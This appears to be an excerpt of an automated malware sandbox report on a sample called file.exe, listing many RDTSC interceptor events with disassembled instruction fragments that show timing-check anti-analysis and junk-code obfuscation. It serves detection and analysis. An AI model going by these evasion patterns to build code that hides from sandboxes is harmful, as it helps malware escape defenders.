              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76D053 second address: 76D058 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76D058 second address: 76D05D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 772451 second address: 772457 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 772457 second address: 772479 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F38751214B7h 0x00000009 jng 00007F38751214A6h 0x0000000f popad 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 772479 second address: 772495 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 pop eax 0x00000007 pop ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F3874C2D1E2h 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 772495 second address: 7724A3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F38751214AAh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7724A3 second address: 7724C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c jg 00007F3874C2D1D6h 0x00000012 popad 0x00000013 jo 00007F3874C2D1E7h 0x00000019 jmp 00007F3874C2D1DBh 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 771188 second address: 77118E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77118E second address: 771192 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 771192 second address: 771198 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 771745 second address: 771760 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop eax 0x00000007 pushad 0x00000008 push eax 0x00000009 pop eax 0x0000000a push esi 0x0000000b pop esi 0x0000000c jp 00007F3874C2D1D6h 0x00000012 popad 0x00000013 popad 0x00000014 push esi 0x00000015 push eax 0x00000016 push edx 0x00000017 push ebx 0x00000018 pop ebx 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 771760 second address: 771764 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7718A0 second address: 7718A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7718A6 second address: 7718AC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 747F30 second address: 747F43 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3874C2D1DFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 747F43 second address: 747F58 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F38751214ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74C893 second address: 74C899 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74C97B second address: 74C99B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F38751214B6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e pop edi 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 751230 second address: 751234 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A953D second address: 7A9543 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A9543 second address: 7A9547 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A9547 second address: 7A954D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A96DE second address: 7A96FB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F38751214B8h 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A96FB second address: 7A9709 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A99F7 second address: 7A9A0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F38751214AAh 0x00000009 push edx 0x0000000a pop edx 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A9A0C second address: 7A9A12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A9A12 second address: 7A9A16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A9A16 second address: 7A9A2A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3874C2D1E0h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A9A2A second address: 7A9A34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A9A34 second address: 7A9A3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A9A3A second address: 7A9A3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A9A3E second address: 7A9A44 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B2B5B second address: 7B2B5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B2B5F second address: 7B2B7A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F3874C2D1E5h 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B111D second address: 7B1122 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B1122 second address: 7B112C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edi 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B154C second address: 7B1581 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F38751214AAh 0x00000008 jns 00007F38751214B7h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push esi 0x00000013 jmp 00007F38751214AAh 0x00000018 pushad 0x00000019 popad 0x0000001a pop esi 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B1581 second address: 7B158F instructions: 0x00000000 rdtsc 0x00000002 ja 00007F3874C2D1D8h 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B158F second address: 7B15AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F38751214B7h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B15AA second address: 7B15B0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B16E8 second address: 7B16F3 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B16F3 second address: 7B170A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3874C2D1DFh 0x00000009 push esi 0x0000000a pop esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B184E second address: 7B1853 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B1853 second address: 7B1871 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push esi 0x00000006 jmp 00007F3874C2D1E6h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B1B43 second address: 7B1B48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B1B48 second address: 7B1B4D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B22F0 second address: 7B22F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B22F4 second address: 7B231C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jmp 00007F3874C2D1DFh 0x0000000c jmp 00007F3874C2D1E1h 0x00000011 pop eax 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B231C second address: 7B2328 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jng 00007F38751214A6h 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B2A0B second address: 7B2A11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B7C1A second address: 7B7C20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B7C20 second address: 7B7C26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B7C26 second address: 7B7C2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B7C2E second address: 7B7C34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B7C34 second address: 7B7C53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007F38751214AFh 0x0000000d jc 00007F38751214A6h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B7E01 second address: 7B7E0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F3874C2D1D6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B7F48 second address: 7B7F4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C686D second address: 7C6885 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 push edx 0x0000000a pop edx 0x0000000b jmp 00007F3874C2D1DCh 0x00000010 pop edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C6885 second address: 7C688A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D2C17 second address: 7D2C49 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3874C2D1DCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F3874C2D1DBh 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F3874C2D1E0h 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D2C49 second address: 7D2C4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D2C4F second address: 7D2C59 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F3874C2D1D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D2C59 second address: 7D2C8B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push esi 0x00000004 pop esi 0x00000005 pop edi 0x00000006 pushad 0x00000007 jmp 00007F38751214B6h 0x0000000c jmp 00007F38751214B3h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D64F9 second address: 7D64FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D95D2 second address: 7D95DE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D9482 second address: 7D9497 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3874C2D1E1h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DB5B0 second address: 7DB5BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F38751214A6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DB5BA second address: 7DB5BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DB5BE second address: 7DB5C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DB5C8 second address: 7DB5E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3874C2D1E9h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DB5E5 second address: 7DB604 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F38751214ABh 0x0000000f jmp 00007F38751214AAh 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DD23F second address: 7DD245 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DD245 second address: 7DD249 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E6378 second address: 7E6380 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E4C88 second address: 7E4CA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F38751214A6h 0x0000000a popad 0x0000000b jmp 00007F38751214ACh 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E506C second address: 7E5072 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E51DC second address: 7E51E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push esi 0x00000007 pop esi 0x00000008 popad 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E51E5 second address: 7E5207 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 js 00007F3874C2D1D6h 0x00000009 jmp 00007F3874C2D1E4h 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E5207 second address: 7E5219 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F38751214A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ecx 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E53DF second address: 7E53E4 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E5668 second address: 7E5673 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E9921 second address: 7E9927 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E9927 second address: 7E992D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E9A89 second address: 7E9A9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F3874C2D1D6h 0x0000000a popad 0x0000000b jl 00007F3874C2D1D8h 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E9A9C second address: 7E9AB4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F38751214B2h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E9AB4 second address: 7E9AB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E9AB8 second address: 7E9AE5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F38751214B0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F38751214B2h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E9AE5 second address: 7E9AE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 804EF4 second address: 804F0E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnc 00007F38751214A6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jnc 00007F38751214AEh 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 806F51 second address: 806F55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 806F55 second address: 806F59 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 806A93 second address: 806A99 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 806C1F second address: 806C2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F38751214A6h 0x0000000a push edi 0x0000000b pop edi 0x0000000c popad 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 806C2C second address: 806C3E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3874C2D1DCh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 806C3E second address: 806C42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 806C42 second address: 806C46 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 806C46 second address: 806C53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 806C53 second address: 806C57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 806C57 second address: 806C62 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 806C62 second address: 806C8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F3874C2D1D6h 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d jc 00007F3874C2D1D6h 0x00000013 jmp 00007F3874C2D1E6h 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81B305 second address: 81B33B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F38751214AEh 0x00000007 jmp 00007F38751214AAh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f jmp 00007F38751214B7h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81B33B second address: 81B340 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81B340 second address: 81B346 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 81B346 second address: 81B34C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
